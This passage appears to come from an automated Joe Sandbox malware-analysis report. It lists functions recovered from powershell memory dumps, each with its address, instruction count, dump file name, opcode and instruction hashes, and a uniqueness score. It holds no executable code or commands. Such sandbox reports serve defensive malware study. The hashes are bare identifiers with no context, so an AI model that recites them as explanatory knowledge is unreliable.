                                                                • Opcode Fuzzy Hash: 04d30cab4c9606169ff65063967ca53e4bdfef06f615e491d0d7a390bddbecaf
                                                                • Instruction Fuzzy Hash: 46F06D3DB10108CFCB04DFA4E9486ADBBB6FF44319F100565D9059B364CB70A801CB40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F5E78, Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 876523a8df8fa40e37049611fbdb4d0371e76e542f376d47ef397ba374adea6f
                                                                • Instruction ID: d3bef8338483a71164419a3165cee93d6bff183b2ef386d609f73d74c3401d8f
                                                                • Opcode Fuzzy Hash: 876523a8df8fa40e37049611fbdb4d0371e76e542f376d47ef397ba374adea6f
                                                                • Instruction Fuzzy Hash: F8D017723001106BE314518AAC05FFB76AEDBCAB62F1580BEB209DB28189A59C0143F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08400919, Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463115200.0000000008400000.00000040.00000001.sdmp, Offset: 08400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8400000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 23974fe0ee58b7621e55dc56b49139c93baae5a57354f343ab26d5ca1169f433
                                                                • Instruction ID: 73f452a232dc6624511fe392add1dd5eb76aa987dd242076e8e9f201a297cbb2
                                                                • Opcode Fuzzy Hash: 23974fe0ee58b7621e55dc56b49139c93baae5a57354f343ab26d5ca1169f433
                                                                • Instruction Fuzzy Hash: 43D05E30B0CA00CE7B385AFE641062BF3E3EBC126E324813F840686358DA319842CA41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08410ACC, Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8f102fd1fd6f2e3b2d11d7175d13751896d66cb04ee8e9171cb0889a0ed0d60
                                                                • Instruction ID: 689f5514643af18b56d5677fc8c91543cf50a2ab2ec6f67d64bfeeb524f467ee
                                                                • Opcode Fuzzy Hash: e8f102fd1fd6f2e3b2d11d7175d13751896d66cb04ee8e9171cb0889a0ed0d60
                                                                • Instruction Fuzzy Hash: 8EE01239200110DFC305EF68E458E95BBBAEF4D311F1140ABF90987762CB3698108BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F1870, Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e02ae33809791ddd97b09d2722740fd97a7de001756d17310698090084d7ef8b
                                                                • Instruction ID: c20b91519a6583dc2aafe52ddf6a1edbbab5d1395054f47eb6c58e272ddb571c
                                                                • Opcode Fuzzy Hash: e02ae33809791ddd97b09d2722740fd97a7de001756d17310698090084d7ef8b
                                                                • Instruction Fuzzy Hash: 40D05E35016248AFC341CB28EC8ADC2BFB8EF1A22030540C2F4448B233D631A810CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08410AD0, Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 469792753364831488761da25e47c48a4ad85c8bad19babb7371229e86c5972a
                                                                • Instruction ID: dcd0bba781876f7f764e9281377e831a65099c8063dd9e3bc1ef421b3fd79126
                                                                • Opcode Fuzzy Hash: 469792753364831488761da25e47c48a4ad85c8bad19babb7371229e86c5972a
                                                                • Instruction Fuzzy Hash: 47D05E39200220DFC300EF68E408E99B7A9EF4C311F1180ABEA0987322CA36DC008BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F2F20, Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e279e49c583056268ce9138570ab1d473614632c6431bebb8a8b77a940dbe924
                                                                • Instruction ID: b12549f289bb7e624c064ffe47c0d4e1daf615dbc8e5780b9347b3bc8d39aec6
                                                                • Opcode Fuzzy Hash: e279e49c583056268ce9138570ab1d473614632c6431bebb8a8b77a940dbe924
                                                                • Instruction Fuzzy Hash: 02D0A93511A3848FC301CB68E9868E13FF8AE0A51130900C2E048CBB32CA24B844C792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F27CE, Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                                                                • Instruction ID: a06eb87192045832159c70c98e5485087627207540be2844d37665ca637cde17
                                                                • Opcode Fuzzy Hash: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                                                                • Instruction Fuzzy Hash: 6AD0C97AB04105CFDB10CFA5F884AAEB7B4FF44329F2145A6D61597221D331A916CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F6292, Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                • Instruction ID: 1bb21599ff55eb530763ef50e501e11e3d10e1ae52257aae7359bdcba8af5d6f
                                                                • Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                • Instruction Fuzzy Hash: 08D06C39A000198BCF04CA88E8546DCF7B0FB88329F1480AAD918A7291C77AA956CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08419358, Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be4e4538fcdc23a73ed46f9ff7aad6c0639940baaf97a8f41d45a38db9fe12d0
                                                                • Instruction ID: f2f63558b2390102dc2a798221277bf66e21df0972adc7d4c685201ff893d139
                                                                • Opcode Fuzzy Hash: be4e4538fcdc23a73ed46f9ff7aad6c0639940baaf97a8f41d45a38db9fe12d0
                                                                • Instruction Fuzzy Hash: 59C08C3AF010098FCB00CB98F8848DCFB75FBC8325B01C022E1018B101CB31A121DB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 084110C0, Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93c99aed1849ffec89d4316576ad889b90df72cb35223b03c097c9ed42a38e8d
                                                                • Instruction ID: f3f4e28c362cb980629608201d3cd3842ae894cfc02c1643a11554c2ef5569ad
                                                                • Opcode Fuzzy Hash: 93c99aed1849ffec89d4316576ad889b90df72cb35223b03c097c9ed42a38e8d
                                                                • Instruction Fuzzy Hash: E2C09B555091C00FCF12B675597D1D17F215FF9751F0542D78C8545047D25B0515DBD3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F1880, Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                • Instruction ID: 48dd8479d5063d4be22e798b7a5bb2e74f213407087f6ef6f31ceb787385eb93
                                                                • Opcode Fuzzy Hash: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                • Instruction Fuzzy Hash: 82C0927A150208EFC740DF69E848C45BBB8EF19770711C0A1FA088B332C732E820DA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F2F30, Relevance: .0, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                • Instruction ID: 96a74fec5220f98754945e00ce640a92889f3d2d232068f8612b65c1e83e2114
                                                                • Opcode Fuzzy Hash: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                • Instruction Fuzzy Hash: B4B092351502088F82009B68E448C4073E8AB08A253114090E10C8B232C621FC008A40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions